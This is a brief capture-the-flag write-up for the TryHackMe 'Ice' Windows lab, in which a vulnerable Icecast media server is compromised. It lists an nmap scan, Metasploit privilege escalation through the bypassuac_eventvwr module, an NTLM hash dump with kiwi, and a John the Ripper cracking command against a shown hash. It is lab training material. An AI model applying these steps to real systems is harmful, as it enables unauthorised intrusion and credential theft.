TryHackMe - General

Ice

Ice


Deploy & hack into a Windows machine, exploiting a very poorly secured media server


A simple nmap scan was conducted on the machine. Interesting services like rdp, http were running. Something eye catching was found where a service called icecast was running for http

nmap -sV -sC 10.10.7.18

Image

Image

‎Started Listener

Image

We need to escalate our privileges. Thus an attempt was made to perform post-exploitation enumeration by running a local_exploit_suggester on the meterpreter session that listed possible local exploit we can perform. The first suggested exploit looked promising thus it was selected for privilege escalation and was successful.

run post/multi/recon/local_exploit_suggester

Image

use exploit/windows/local/bypassuac_eventvwr

Image

Now we need to get the password for the ‘DARK’ user for the flag. Thus kiwi was loaded to dump the ntlm hashes. And then john the ripper was used to crack the hash

Image

cat passw
Dark:7c4fe5eada682714a036e39378362bab

‎Cracking Password

john --format=NT --wordlist=/usr/share.wordlists/rockyou.txt passw

Image

____

19 August 2021
Tags: windows mimikatz metasploit

Share this solution: